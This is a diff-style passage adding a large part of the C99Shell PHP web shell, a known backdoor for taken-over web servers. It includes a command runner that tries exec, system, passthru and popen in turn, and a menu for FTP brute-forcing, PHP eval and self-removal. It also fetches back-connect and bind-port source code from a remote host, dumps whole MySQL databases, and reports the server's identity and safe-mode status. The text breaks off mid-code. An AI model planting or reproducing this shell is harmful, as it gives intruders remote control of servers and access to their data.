+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Back]</b>","#\" onclick=\"history.back(1)"),
+ array("<b>[Forward]</b>","#\" onclick=\"history.go(1)"),
+ array("<b>[UPDIR]</b>",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<b>[Refresh]</b>",""),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Buffer]</b>",$surl."act=fsbuff&d=%d"),
+ array("<b>[Encoder]</b></b>",$surl."act=encoder&d=%d"),
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"),
+ array("<b>[Proc.]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP brute]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Sec.]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL]</b>",$surl."act=sql&d=%d"),
+ array("<b>[PHP-code]</b>",$surl."act=eval&d=%d"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Logout]</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
